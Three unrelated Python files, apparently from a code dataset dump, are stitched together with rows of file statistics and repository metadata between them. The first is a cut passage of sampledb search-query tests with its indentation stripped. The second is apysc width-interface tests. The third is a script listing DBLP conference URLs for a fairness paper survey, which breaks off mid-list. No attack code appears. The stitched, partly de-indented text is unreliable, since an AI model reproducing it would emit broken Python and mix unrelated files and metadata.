filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == [('warning', 'This search will always return all objects', 0, len('True'))]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'This search will never return any objects', 0, len('False'))]
def test_find_by_other_literal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-12', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Unable to use literal as search query', 0, len('2018-10-12'))]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Unable to use literal as search query', 0, len('20mm'))]
def test_find_by_text_operators(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not not False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'This expression will always be true', len('not '), len('not not False'))]
def test_find_by_negative_quantity(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('-2kg < 0kg', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == []
def test_find_by_parentheses_only(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('()', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Empty search', 0, 2)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(()())', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Invalid search query (missing operator)', 0, None)]
def test_find_by_automatic_advanced_search(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': 'This is an example.'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr = "This is an example."', use_advanced_search=False)
assert use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"text_attr = "This is an example.""', use_advanced_search=False)
assert not use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_with_name_collision(user) -> None:
schema1 = {
'title': 'Example Object',
'type': 'object',
'properties': {
'name': {
'title': 'Name',
'type': 'text'
},
'vs': {
'title': 'vs',
'type': 'text'
}
},
'required': ['name']
}
schema2 = {
'title': 'Example Object',
'type': 'object',
'properties': {
'name': {
'title': 'Name',
'type': 'text'
},
'vs': {
'title': 'vs',
'type': 'array',
'items': {
'type': 'object',
'title': 'v',
'properties': {
'v': {
'title': 'v',
'type': 'text'
}
}
}
}
},
'required': ['name']
}
action1 = sampledb.logic.actions.create_action(
action_type_id=sampledb.models.ActionType.SAMPLE_CREATION,
schema=schema1
)
action2 = sampledb.logic.actions.create_action(
action_type_id=sampledb.models.ActionType.SAMPLE_CREATION,
schema=schema2
)
data1 = {
'name': {
'_type': 'text',
'text': 'o1'
},
'vs': {
'_type': 'text',
'text': 'v1'
}
}
data2 = {
'name': {
'_type': 'text',
'text': 'o1'
},
'vs': [
{
'v': {
'_type': 'text',
'text': 'v1'
}
}
]
}
sampledb.logic.objects.create_object(action1.id, data1, user.id)
sampledb.logic.objects.create_object(action2.id, data2, user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('vs == "v1"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert objects[0].data == data1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('vs.?.v == "v1"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert objects[0].data == data2
assert len(search_notes) == 0
| 48.269753
| 180
| 0.709352
| 15,954
| 120,964
| 5.05027
| 0.012599
| 0.195477
| 0.09579
| 0.139627
| 0.976468
| 0.971156
| 0.970114
| 0.968264
| 0.967594
| 0.966266
| 0
| 0.01767
| 0.178433
| 120,964
| 2,505
| 181
| 48.289022
| 0.793077
| 0.000107
| 0
| 0.730056
| 0
| 0
| 0.100917
| 0.003374
| 0
| 0
| 0
| 0
| 0.242115
| 1
| 0.027365
| false
| 0
| 0.002319
| 0
| 0.030612
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcc9f80c4693529deeaf74a8ab4206b0655d1509
| 4,556
|
py
|
Python
|
tests/_display/test_width_interface.py
|
ynsnf/apysc
|
b10ffaf76ec6beb187477d0a744fca00e3efc3fb
|
[
"MIT"
] | 16
|
2021-04-16T02:01:29.000Z
|
2022-01-01T08:53:49.000Z
|
tests/_display/test_width_interface.py
|
ynsnf/apysc
|
b10ffaf76ec6beb187477d0a744fca00e3efc3fb
|
[
"MIT"
] | 613
|
2021-03-24T03:37:38.000Z
|
2022-03-26T10:58:37.000Z
|
tests/_display/test_width_interface.py
|
simon-ritchie/apyscript
|
c319f8ab2f1f5f7fad8d2a8b4fc06e7195476279
|
[
"MIT"
] | 2
|
2021-06-20T07:32:58.000Z
|
2021-12-26T08:22:11.000Z
|
import re
from random import randint
from typing import Match
from typing import Optional
from retrying import retry
import apysc as ap
from apysc._display.width_interface import WidthInterface
from apysc._expression import expression_data_util
from apysc._expression import var_names
class TestWidthInterface:
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test_width(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface.width = ap.Int(100)
assert width_interface.width == 100
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__append_width_update_expression(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
expression_data_util.empty_expression()
width_interface.width = ap.Int(200)
expression: str = expression_data_util.get_current_expression()
match: Optional[Match] = re.search(
pattern=rf'test_width_interface\.width\({var_names.INT}_.+?\);',
string=expression,
flags=re.MULTILINE,
)
assert match is not None
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test_update_width_and_skip_appending_exp(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
expression_data_util.empty_expression()
width_interface._update_width_and_skip_appending_exp(
value=ap.Int(300))
assert width_interface.width == 300
expression: str = expression_data_util.get_current_expression()
match: Optional[Match] = re.search(
pattern=(
rf'width\({var_names.INT}_.+?\)'
),
string=expression,
flags=re.MULTILINE)
assert match is None
width_interface._update_width_and_skip_appending_exp(
value=400)
assert width_interface.width == 400
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__initialize_width_if_not_initialized(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface._initialize_width_if_not_initialized()
assert width_interface.width == 0
width_interface.width = ap.Int(10)
width_interface._initialize_width_if_not_initialized()
assert width_interface.width == 10
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__make_snapshot(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface.width = ap.Int(10)
snapshot_name: str = 'snapshot_1'
width_interface._run_all_make_snapshot_methods(
snapshot_name=snapshot_name)
assert width_interface._width_snapshots[snapshot_name] == 10
width_interface.width = ap.Int(15)
width_interface._run_all_make_snapshot_methods(
snapshot_name=snapshot_name)
assert width_interface._width_snapshots[snapshot_name] == 10
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__revert(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface.width = ap.Int(10)
snapshot_name: str = 'snapshot_1'
width_interface._run_all_make_snapshot_methods(
snapshot_name=snapshot_name)
width_interface.width = ap.Int(15)
width_interface._run_all_revert_methods(snapshot_name=snapshot_name)
assert width_interface.width == 10
width_interface.width = ap.Int(15)
width_interface._run_all_revert_methods(snapshot_name=snapshot_name)
assert width_interface.width == 15
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__append_width_attr_linking_setting(self) -> None:
interface: WidthInterface = WidthInterface()
interface.variable_name = 'test_width_interface'
interface._initialize_width_if_not_initialized()
assert interface._attr_linking_stack['width'] == [ap.Int(0)]
| 42.981132
| 77
| 0.697322
| 531
| 4,556
| 5.576271
| 0.150659
| 0.222222
| 0.141169
| 0.075988
| 0.819656
| 0.805809
| 0.773725
| 0.75819
| 0.75819
| 0.729821
| 0
| 0.029104
| 0.223222
| 4,556
| 105
| 78
| 43.390476
| 0.807573
| 0
| 0
| 0.566667
| 0
| 0
| 0.054819
| 0.017749
| 0
| 0
| 0
| 0
| 0.133333
| 1
| 0.077778
| false
| 0
| 0.1
| 0
| 0.188889
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bce506315f62266ddeaa67e0cc7d8d6332c2cb76
| 23,851
|
py
|
Python
|
dlfairness/other/get_paper_survey_list/dump_dblp.py
|
lin-tan/fairness-variance
|
7f6aee23160707ffe78f429e5d960022ea1c9fe4
|
[
"BSD-3-Clause"
] | null | null | null |
dlfairness/other/get_paper_survey_list/dump_dblp.py
|
lin-tan/fairness-variance
|
7f6aee23160707ffe78f429e5d960022ea1c9fe4
|
[
"BSD-3-Clause"
] | null | null | null |
dlfairness/other/get_paper_survey_list/dump_dblp.py
|
lin-tan/fairness-variance
|
7f6aee23160707ffe78f429e5d960022ea1c9fe4
|
[
"BSD-3-Clause"
] | null | null | null |
import web_utils
from pprint import pprint
import nltk
import re
import yaml
from pathlib import Path
import csv
import argparse
keywords = [
'fair',
'bias',
'discriminate',
'aware',
'balance',
'disparity',
'opportunity',
'audit',
'gender',
'stereotype',
'race',
'amplification'
]
links = {
'NIPS': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/neurips2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2016.bht%3A&h=1000&format=json'
],
'ICML': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2016.bht%3A&h=1000&format=json'
],
'FSE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2015.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2010.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec99.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse98.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec97.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse96.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec95.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse94.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec93.bht%3A&h=1000&format=json'
],
'ICSE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse99.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse98.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse97.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse96.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse95.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse94.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse93.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse92.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse91.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse90.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse89.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse88.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse87.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse86.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse85.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse84.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse83.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse82.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse81.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse80.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse79.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse78.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse77.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse76.bht%3A&h=1000&format=json'
],
'FairWare@ICSE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/fairware2018.bht%3A&h=1000&format=json'
],
'ISSTA': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2015.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2010.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta98.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta96.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta94.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta93.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/tav91.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/tav89.bht%3A&h=1000&format=json'
],
'ASE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2015.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2010.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase1999.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase1998.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase1997.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1996.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1995.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1994.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1993.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1992.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1991.bht%3A&h=1000&format=json'
],
'ACL': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2019-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2018-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2017-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2016-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2018-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2017-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2016-2.bht%3A&h=1000&format=json'
],
'EMNLP': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2020-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2019-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2016.bht%3A&h=1000&format=json'
],
'AAAI': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2016.bht%3A&h=1000&format=json'
],
'CVPR': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2018.bht%3A&h=1000&format=json',
